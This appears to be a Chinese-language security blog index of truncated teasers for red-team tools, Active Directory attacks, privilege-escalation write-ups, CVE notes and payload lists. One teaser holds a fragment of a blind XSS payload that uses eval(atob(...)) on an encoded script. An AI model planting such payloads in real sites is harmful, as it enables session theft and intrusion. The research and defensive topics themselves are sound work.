Google Chrome CVE-2022-3656 漏洞

Imperva Red Team 最近披露了一个名为 CVE-2022-3656 的漏洞，该漏洞影响超过 25 亿 Google Chrome 和基于 Chro...

【云安全最佳实践】基础防护建设

做好基线核查和加固是安全管理工作中的基础工作，但却与安全事件密切相关。例如系统账号登录策略未做好合规要求，黑客就可以通过弱口令、默认口令等方式登录系统。但如果做...

bypass payload list

红队利器 - SharpSniper

通常，红队参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁，例如 CEO。

从 RPC 到 RCE - 通过 RBCD 和 MS-RPC 接管工作站

在 Active Directory 的默认配置中，可以在其 WebClient 服务运行时远程接管工作站 (Windows 7/10/11) 和可能的服务器（...

域持久性：银票攻击

白银票证是针对特定服务的伪造服务或 TGS 票证，可用于在与 Active Directory 企业域连接的受感染系统上保持持久性。在攻击中，攻击者...

5000字解析：实战化场景下的容器安全攻防之道

在这个数字化转型关键时期，以容器为代表的云原生技术凭借自身的优势，正在逐渐成为核心IT基础设施。云原生已经不再是少部分“创新者”的特权，而是成为了市场主流选择，...

DOMDig - 用于单页应用程序的 DOM XSS 扫描器

DOMDig 是一个运行在 Chromium 网络浏览器中的 DOM XSS 扫描器，它可以递归地扫描单页应用程序 (SPA)。

Atlassian Confluence 蜜罐 (CVE-2022-26134)

ConfluencePot 是针对 Atlassian Confluence 未经身份验证和远程 OGNL 注入漏洞 ( CVE-2022-26...

神兵利器 - SharpEventPersist

shellcode 转换为十六进制并写入“密钥管理服务”，事件级别设置为“信息”，源为“持久性”。 运行 SharpEv...

红队提权 - 可写系统路径权限提升

这些问题的根本原因来自常见的系统配置错误，这使得识别和利用这些问题非常可靠。相比之下，传统的基于内存损坏的本地权限提升漏洞通常需要固定偏移量，具...

红队提权 - 基于RBCD的提权

在这种情况下，我们利用这样一个事实，即从非特权用户上下文中，我们可以诱导以 NT AUTHORITY\SYSTEM 身份运行的本地服务通过 HT...

CVE-2022-23222：Linux 内核 eBPF 本地权限提升

https://github.com/tr3ee/CVE-2022-23222 近期在对Linux eBPF进行代码审计的过程中，发现了一枚权限提升漏洞...

快速 CRLF 注入扫描工具

CRLFsuite 是一款专为扫描而设计的快速工具CRLF injection

神兵利器 - C2框架Atlas

生成client、teamserver、implant的exe后，直接执行Teamserver.exe即可启动teamserver

一些用于查找敏感文件的语法

Blind XSS

"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlb...

Top25漏洞常见参数

基础研究，参考各种文章，使用频率前 25 位的。这些参数可用于工具或手动使用的参数。

Sql-injection-Payload

通过CdpSvc服务提升Windows本地权限

它运行NT AUTHORITY\LOCAL SERVICE并尝试在启动时通过调用加载缺少的cdpsgshims.dllLoadLibrary() DLL ，而不...